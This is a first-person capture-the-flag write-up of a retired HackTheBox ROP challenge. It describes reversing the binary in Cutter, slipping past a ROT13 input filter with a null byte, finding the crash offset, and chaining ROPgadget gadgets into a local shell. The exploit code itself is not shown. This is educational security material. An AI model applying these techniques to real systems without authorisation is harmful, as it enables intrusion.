This is a recently retired binary exploitation(pwn) challenge from hackthebox.It is a 64-bit ELF binary with NX protection enabled. Based on the name we already know we need to use ROP to exploit this binary. I will be using Cutter for reverse engineering this binary.
Cutter is a Free and Open Source RE Platform powered by radare2
I assume that anyone reading this post is familiar with the basics of binary exploitation, as i skipped explaining many basic things. And please note that i am just learning these concepts, none of these things are new research or expert opinion.
Open the binary using Cutter and Select the aaa option to analyze the binary
aaa command execute other below commands to analyze the binary.
+ aac - analyze function calls + aar - analyze len bytes of instructions for references + afta - do type matching analysis for all functions
Binary protection :
Using checksec command we can check, the protection enabled in the binary.
- As expected Binary has a non executable stack.
For futher analysis i decompile the binary, here is the snippet of main’s pseudocode.
- Prints a welcome message “Please dont hack me”
- Call to read that reads 500 bytes from stdin.
- strcmp compares the entered string with “DEBUG”
From the main function graph view we can see, at the end the program it CALL’s to another function.
Lets have a look at this function.
To decompile a function right-click and select show-in decompiler.
What is the purpose of a function?
- This function just apply RO13 to the inputs we enter
- It add or sub 0xd to every character we enter.
- we can bypass this by adding a null byte to the begning of our payload
ROT13 (“rotate by 13 places”, sometimes hyphenated ROT-13) is a simple letter substitution cipher that replaces a letter with the 13th letter after it, in the alphabet.
So now binary analysis out of the way lets start exploiting.
I will use a pwntool based script for fuzzing the binary.
After running the script, monitor from the GDB for crashes.
- The program crashed and registers are overwritten, but thats not the payload we sent !
- we send “A”s but it is overwritten with “nnnnn”
- So here what happend was the rot13 function messed up our payload. From the binary analysis we know there is function which apply ROT13 operation on the input we enter.
Lets modify our script to get around with rot13.
- Open the program in GDB and set a break point
- Send the unique pattern to the program
- Added a nullbyte to the start of the payload to stop rot13 messing with it
After running the script, PRESS “c” to continue the execution.
Program received segmentation fault and crashed.
To calculate the offset copy and past the value in RIP to Metasploit pattern_offset tool.
Collecting ROP Gadgets
I used ROPGadget tool to find the gadgets.
Below are the gadgets we need to form our ropchain
Thats all we need to build the exploit.
Running the exploit, we get a local shell.
This was a great challenge i learned few new binary exploitation techniiques.
You can find all code for this challenge from my github repo: https://github.com/d3b4g/ropchallenges/